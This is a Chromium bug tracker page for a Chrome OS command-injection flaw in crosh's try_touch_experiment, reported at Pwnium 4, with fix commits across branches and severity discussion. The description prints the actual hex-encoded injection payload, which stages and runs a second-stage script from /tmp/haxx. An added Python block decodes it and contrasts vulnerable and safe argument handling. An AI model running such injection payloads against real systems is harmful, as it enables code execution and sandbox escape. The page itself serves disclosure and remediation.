
Issue 351796

Starred by 2 users

Issue metadata

Status: Verified
Owner:
Closed: Mar 2014
Cc:
EstimatedDays: ----
NextAction: ----
OS: Chrome
Pri: 2
Type: Bug-Security

Blocking:
issue 351788




Security: Pwnium 4 GeoHot bug: try_touch_experiment command injection

Reported by jorgelo@chromium.org (Project Member), Mar 12 2014

Issue description

mkdir -p /tmp/haxx ; grep -a -v "\[" /var/log/chrome/chrome | tail -n1 | base64 -d | tar zx -C /tmp/haxx ; /bin/bash /tmp/haxx/autoexec.sh 1>&2

"try_touch_experiment 61273b62617368202d6320276d6b646972202d70202f746d702f68617878203b2067726570202d61202d7620225c5b22202f7661722f6c6f672f6368726f6d652f6368726f6d65207c207461696c202d6e31207c20626173653634202d64207c20746172207a78202d43202f746d702f68617878203b202f62696e2f62617368202f746d702f686178782f6175746f657865632e736820313e2632273b6563686f20273a312e302c69\n"
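
The injection in the description above, worked through as an added example (editor-added Python; not crosh's code and not part of the bug report): it decodes the page's hex argument to show how the attacker closes the single-quoted string, splices in `bash -c '...'`, then reopens a quote so the rest of the original command line still parses, and it contrasts a stand-in handler that interpolates the argument into `sh -c` command text (the pattern the report exploits) with one that passes it as a positional parameter. `run_vulnerable`, `run_safe`, `run_quoted` and the `echo 'experiment id: ...'` command are hypothetical stand-ins, not the real try_touch_experiment handler, and the harmless `a';echo INJECTED;echo '` argument is constructed for the demonstration.

```python
"""Editor-added example; not code from crosh or from this bug report.

PAYLOAD_HEX is the try_touch_experiment argument quoted in the issue
description.  The handlers run_vulnerable / run_safe / run_quoted are
hypothetical stand-ins that model the difference between splicing an
argument into shell command text and passing it out of band.
"""
import shlex
import subprocess
from typing import List, Tuple

# Hex-encoded argument copied from the issue description, split into
# chunks that line up with the decoded shell words.
PAYLOAD_HEX = (
    "61273b62617368202d632027"                      # a';bash -c '
    "6d6b646972202d70202f746d702f68617878203b20"    # mkdir -p /tmp/haxx ;
    "67726570202d61202d7620225c5b2220"              # grep -a -v "\["
    "2f7661722f6c6f672f6368726f6d652f6368726f6d65207c20"  # /var/log/chrome/chrome |
    "7461696c202d6e31207c20626173653634202d64207c20"      # tail -n1 | base64 -d |
    "746172207a78202d43202f746d702f68617878203b20"        # tar zx -C /tmp/haxx ;
    "2f62696e2f62617368202f746d702f686178782f6175746f657865632e736820313e2632"  # /bin/bash /tmp/haxx/autoexec.sh 1>&2
    "273b6563686f20273a312e302c69"                  # ';echo ':1.0,i
)


def decode_payload(hex_text: str) -> str:
    """Decode the hex-encoded argument into the string the shell would see."""
    return bytes.fromhex(hex_text).decode("ascii")


def split_injection(arg: str) -> Tuple[str, str, str]:
    """Split an argument of the form  X';<injected>';Y  into its three parts.

    The first  ';  closes the single-quoted string the argument was
    interpolated into; the middle runs as its own command; the final  ';
    followed by  echo '  reopens a quote so the command line's own closing
    quote still matches.  In this report the injected command reads the last
    line of /var/log/chrome/chrome that does not contain '[', base64-decodes
    it into a tarball, unpacks it under /tmp/haxx and runs autoexec.sh, i.e.
    the Chrome log is the delivery channel for the second stage.
    """
    prefix, rest = arg.split("';", 1)
    injected, suffix = rest.rsplit("';", 1)
    return prefix, injected, suffix


def run_vulnerable(arg: str) -> List[str]:
    """Hypothetical handler that splices the argument into command text
    (the bash equivalent is  eval "tool '$arg'").  Returns stdout lines."""
    command = f"echo 'experiment id: {arg}'"
    result = subprocess.run(["sh", "-c", command],
                            capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


def run_safe(arg: str) -> List[str]:
    """Same shell, but the argument arrives as positional parameter $1, so
    the shell never parses it as command text: quotes and ';' are inert."""
    result = subprocess.run(
        ["sh", "-c", 'printf "%s\\n" "experiment id: $1"', "sh", arg],
        capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


def run_quoted(arg: str) -> List[str]:
    """When command text must be built, shlex.quote turns the argument into
    one shell word (bash: printf '%q')."""
    command = f"echo 'experiment id: '{shlex.quote(arg)}"
    result = subprocess.run(["sh", "-c", command],
                            capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


if __name__ == "__main__":
    prefix, injected, suffix = split_injection(decode_payload(PAYLOAD_HEX))
    print("prefix  :", prefix)
    print("injected:", injected)
    print("suffix  :", suffix)
    harmless = "a';echo INJECTED;echo '"   # constructed, harmless test argument
    print("vulnerable:", run_vulnerable(harmless))   # three lines, one is INJECTED
    print("safe      :", run_safe(harmless))         # one line, argument verbatim
    print("quoted    :", run_quoted(harmless))       # same as safe
```

Running the block prints the three parts of the real payload and then the harmless argument through each handler: the interpolating handler executes the injected `echo INJECTED`, while the positional-parameter and shlex.quote handlers print the argument back as a single literal line.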

 
Blocking: chromium:351788
Cc: adlr@chromium.org

Comment 3 by adlr@chromium.org, Mar 12 2014

Cc: jorgelo@chromium.org
Labels: ReleaseBlock-Dev M-33
Owner: adlr@chromium.org
Status: Started
We can safely remove this from the image for now.

Need to go as far back as R33. CLs are being prepared now.

Comment 4 by adlr@chromium.org, Mar 12 2014

Labels: Merge-Requested

Comment 5 by dharani@google.com, Mar 12 2014

Labels: -ReleaseBlock-Dev -Merge-Requested ReleaseBlock-Stable Merge-Approved

Comment 6 Deleted

Comment 8 by adlr@chromium.org, Mar 12 2014

personal ToT image looks good! try_touch_experiment is removed from the image.

I'll double check the bot images when they're ready and then submit the CLs.

Comment 9 by sumit@chromium.org, Mar 12 2014

Cc: skuhne@chromium.org
Labels: M-34
Status: Fixed
We still need to merge to m33 and m34.
Sweet! Thanks Andrew!

Comment 12 by adlr@chromium.org, Mar 12 2014

Status: Started
These CLs aren't in yet. I'm still waiting on bots, even for ToT.
Thanks! Please update when bots pass.

Comment 16 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : master
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 56407aa2121f611ab5909b77cdbf6baad9183894

Code-Review  0 : Andrew de los Reyes
Code-Review  +2: Jorge Lucangeli Obes, Kees Cook
Commit-Queue 0 : Jorge Lucangeli Obes, Kees Cook
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes, Kees Cook
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I3cfd85ef85930548959e72c1e54ce693e8f0b573
Reviewed-at    : https://chromium-review.googlesource.com/189659

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild

Comment 17 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/platform/crosh
Branch : master
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : fc53dcba3ef19b3be959a3dfe0608514f2eef88b

Code-Review  0 : Andrew de los Reyes
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I05f97d83d407de5d516b10548441bb7d8376987d
Reviewed-at    : https://chromium-review.googlesource.com/189648

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 18 by adlr@chromium.org, Mar 12 2014

Status: Fixed
changes submitted to ToT. Still verifying stabilize, R34, R33

Comment 19 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : release-R34-5500.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 36528f922bc9d6431d5879162a515c0fc19f93c4

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I6e076a05451acb26cc756edf4f7f9348d1a9bb69
Reviewed-at    : https://chromium-review.googlesource.com/189673

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild

Comment 20 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/platform/crosh
Branch : release-R34-5500.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 6c247daea3dda481c150843f17de33c84ef155dc

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I0660280322e9d6c46e252ebdbc697a7e488cb7bd
Reviewed-at    : https://chromium-review.googlesource.com/189681

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 21 by adlr@chromium.org, Mar 12 2014

ToT and R34 verified and submitted. Still testing R33, stabilize

Comment 22 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/platform/crosh
Branch : release-R33-5116.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : daad75e0f1de03ae1ffac6a0e7c741e14d329c80

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I72639ed661fc5ec829b69b7341b86cbab9edebdf
Reviewed-at    : https://chromium-review.googlesource.com/189691

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 23 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : release-R33-5116.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : a27ffd049e3847ae161d892c9e1af45595ad495d

Code-Review  +2: Andrew de los Reyes
Commit-Queue +1: Andrew de los Reyes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : Ifcc73c12f4f51a23cf54281c9c3a518a07fff1fe
Reviewed-at    : https://chromium-review.googlesource.com/189680

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild

Comment 24 by adlr@chromium.org, Mar 12 2014

ToT, R34, R33 checked in. Still waiting on bot for stabilize

Comment 25 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/overlays/chromiumos-overlay
Branch : stabilize-5116.115.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 28afc81289893c1185d7eda2f2a0059f14aba9c1

Code-Review  0 : Jorge Lucangeli Obes
Code-Review  +2: Andrew de los Reyes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : Id5c84c3d2f3f6257fe6f16d69b8fbc26ce6f9543
Reviewed-at    : https://chromium-review.googlesource.com/189687

crosh/crosh: Remove dependency on salsa

BUG= chromium:351796 
TEST=manually tested buildbot image

chromeos-base/crosh/crosh-9999.ebuild

Comment 26 by bugdroid1@chromium.org (Project Member), Mar 12 2014

Project: chromiumos/platform/crosh
Branch : stabilize-5116.115.B
Author : Andrew de los Reyes <adlr@chromium.org>
Commit : 85e403a6d56a745b0d89d6c7a0fc83c72c3616d2

Code-Review  0 : Jorge Lucangeli Obes
Code-Review  +2: Andrew de los Reyes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Andrew de los Reyes
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Andrew de los Reyes
Commit Queue   : Chumped
Change-Id      : I7fd54cea53811148372ecd65936b1e4ba8b85952
Reviewed-at    : https://chromium-review.googlesource.com/189677

Remove try_touch_experiment.

BUG= chromium:351796 
TEST=tested buildbot image

crosh

Comment 27 by adlr@chromium.org, Mar 12 2014

Labels: -Merge-Approved Merge-Merged
Fix is in ToT, R34, R33, stabilize-5116.115.B.

I think that's all for now!
Labels: Release-2-M33
Labels: -Release-2-M33 Release-3-M33
Cc: deepakg@chromium.org
Labels: CVE-2014-1706

Comment 32 by k...@google.com, Mar 14 2014

Cc: kamakshi@chromium.org
Labels: Security_Impact-Beta Security_Impact-Stable
Labels: Security_Severity-Critical
Sandbox escape.
Labels: -Security_Severity-Critical Security_Severity-High
High for sandbox escapes.
Labels: -Security_Severity-High Security_Severity-Low
The Schuh thinks this is low, because without the process confusion you would need to be running as the browser process to talk to crosh, at which point there's no real escalation.
Cc: mbevand@google.com
Cc: charliemooney@chromium.org

Comment 39 by ClusterFuzz (Project Member), Jun 18 2014

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.

Comment 40 by krisr@chromium.org, Jun 24 2014

Status: Verified

Comment 41 Deleted

It's been fixed, you can't do it anymore

Comment 43 by sheriffbot@chromium.org (Project Member), Mar 22 2016

Labels: -security_impact-beta

Comment 44 by sheriffbot@chromium.org (Project Member), Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 45 by sheriffbot@chromium.org (Project Member), Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 46 by sheriffbot@chromium.org (Project Member), Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic

Comment 48 by sheriffbot@chromium.org (Project Member), Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-submitted

Comment 50 by sheriffbot@chromium.org (Project Member), Jul 28

Labels: -Pri-0 Pri-2
